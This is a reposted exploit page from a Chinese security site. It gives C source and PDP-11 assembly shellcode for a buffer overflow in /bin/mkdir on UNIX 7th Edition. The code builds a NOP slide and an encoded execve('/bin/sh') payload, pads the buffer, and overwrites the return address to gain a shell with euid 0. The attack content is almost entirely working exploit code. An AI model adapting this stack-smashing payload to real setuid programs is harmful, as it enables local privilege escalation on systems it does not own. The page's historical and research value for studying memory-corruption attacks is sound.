首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
mkdir buffer overflow UNIX 7th Edition Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-06-04  

mkdir /bin/mkdir buffer overflow UNIX 7th Edition Exploit

/*
* Exploit for /bin/mkdir Unix V7 PDP-11.
* mkdir has a buffer overflow when checking if the directory
* in /arg/with/slashes/fname exists.
*
* This will run /bin/sh with euid 0, but not uid 0. Since
* the shell doesn't do anything special about this, we don't
* really care. If you care, run setuid(0); execl("/bin/sh", 0);
*/

/*
.globl _main
_main:
mov pc,r1
sub $-[sh-_main-2], r1 / pointer to sh
mov r1, r2
sub $-8, r2
clrb -1(r2) / null terminate
mov r1, r2
clr -(r1) / char *env[] = {0}
mov r1, r3
mov r2, -(r1) / char *argv[] = {sh, 0}
mov r1, r4
mov r3, -(r1) / reverse of sh,argv,env
mov r4, -(r1)
mov r2, -(r1)
sys 59.; 11111; 11111; 11111 / call execve
argv: 11111; 11111
sh: </bin/sh>
*/

char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };

#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0

main(argc, argv)
int argc;
char **argv;
{
char buf[400];
int i;
char *argv2[4];

/* nop slide + egg */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);

/* pad out to CNT */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';

/* overwrite retaddr */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;

/* extra stuff */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;

argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
execv(argv2[0], argv2);
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mollensoft FTP Server CMD Buff
·Apache/1.3.27 - Remote Root Ex
·BNBT BitTorrent Tracker DoS Ex
·Symantec Firewall DNS Response
·Condition Vulnerability Allows
·Metamail Buffer Overflow Explo
·Linksys BOOTP Memory Leak Expl
·Mkdir本地缓冲区溢出漏洞
·NetBSD/FreeBSD移植的Systrace E
·Colin McRae Rally DoS Exploit
·ProFTPd remote users discovery
·RedHat 8x LPRng autorooter
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved